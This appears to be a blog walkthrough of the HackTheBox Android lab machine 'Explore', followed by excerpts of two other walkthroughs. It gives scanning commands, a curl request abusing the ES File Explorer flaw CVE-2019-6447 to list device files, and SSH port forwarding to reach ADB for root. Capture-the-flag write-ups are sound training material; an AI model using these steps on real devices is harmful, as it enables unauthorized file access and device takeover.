Skip to main content

HackTheBox Walkthrough - Explore


🛡️Types of OS : Android

🌞Released on : 26th June 2021

☢️Difficulty : Easy

👍Point: 20

nmap -vv — reason -Pn -A — osscan-guess — version-all -p- $IP -oN Explore.nmap

nmap_scan.report

💉Running the nmap scan gives four ports

port 2222 — ssh

port 59777 — http

port 5555 — adbshell {This can be found by looking on google}

adb_shell_port

ffuf -u http://explore.htb:59777/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 -c

ffuf_scan

😃Lets visit the web-page

😜As you can see its showing forbidden. So lets try some other directory.

😃And we get the same results. Lets try to enumerate port 59777 which service uses this port on android.

☺️we get this article from Daily-Swigg which explain the vulnerability in ES File explorer which exposes user data on open port and anyone can read it.

😏Lets try running FFUF on http://explore.htb:59777/sdcard/

ffuf_sdcard

😏Look like we found our first flag. So easy

😁The POC for the above vulnerability can be found on this link

👍Going through POC i found we can execute command

😌looking from above picture we can find some basic command so let’s try them.

curl — header “Content-Type: application/json” — request POST — data ‘{“command”:”listFiles”}’ http://explore.htb:59777/sdcard/DCIM

image

🤔Lets check creds.jpg

ssh_creds

😊Here we found creds for ssh. Now lets ssh in the box

ssh kristi@explore.htb -p 2222

Password authentication

Password:

:/ $ id

uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768

😃I check does the user have execution right but it does-not. So basically we cannot install anything to get root. But we have 5555 port open which is running adb shell. I tried to access it from my kali machine but i couldn’t.

open_ports

😶As we can see 5555 is listening, so lets try to port forward it through ssh and try to connect it through our box.

ssh -L 5555:127.0.0.1:5555 kristi@explore.htb -p 2222

adb connect localhost:5555

connected to localhost:5555

adb shell

error: more than one device/emulator

😊Run the following command to get shell, if it shows the error like above then try to list the devices by this adb devices

🥳As you can see there are two devices connected. Therefore lets connect to a specific device through the command adb -s localhost:5555 shell instruction fort his command can be found here

💖And we get root on connecting through adb shell.

🥳The root flag can be found in data directory.

............Rooted...........

💖Summary of knowledge

💉ES File Explorer Security Vulnerability CVE-2019–6447

🛡️ssh port forwarding to get root

Comments

Post a Comment

Popular posts from this blog

HackTheBox Active Machine Walkthrough - Knife 🗡️

😍A knife is only as good as the one who wields it Hocho Knife #Easy #Linux Machine created by MrKN16H went live 22 May 2021 at 19:00:00 UTC. 😜Let's Start the journey..... 🔐Enumeration🔰 💉From Dmitry result one thing caught my and that is it an apache httpd server instead of regular nginx in all the HackTheBox Machine. 🔰We can find 2 Open Ports. In Port 80 We can see web page. 🔧As the latest release for apache httpd is 2.4.46 there could be a known vuln in 2.4.41 so I looked for it on web. 🗽Looking for it I stumbled around this Rapid7 Post https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2020-1934/. 🔰But there is one concerning thing about this exploit you need to have mod_proxy_ftp module running and have FTP backend which we know nothing of. 🖥️Web-Visting🛡️ 🤔We can find this static page and nothing  interesting in it.  🔐Looking the source code found pen.js which looked interesting but after looking at it got nothing interesting. Also added knife.htb in /etc/h...
7 comments
Read more

HackTheBox Walkthrough - Luanne

Luanne is a machine on the HackTheBox. Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated. This article will show how to hack Luanne box and get user.txt and root.txt. 😜Background😜 Luanne is a retired vulnerable VM from Hack The Box. 🔰Information Gathering Let’s start with a masscan probe to establish the open ports in the host. # masscan -e tun0 -p1-65535,U:1-65535 10.10.10.218 --rate=1000 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-02 07:55:24 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 9001/tcp on 10.10.10.218 Discovered open port 22/tcp on 10.10.10.218 Discovered open port 80/tcp on 10.10.10.218 Open port 9001/tcp looks interesting. Let’s do one better with nmap scanning the discover...
Post a Comment
Read more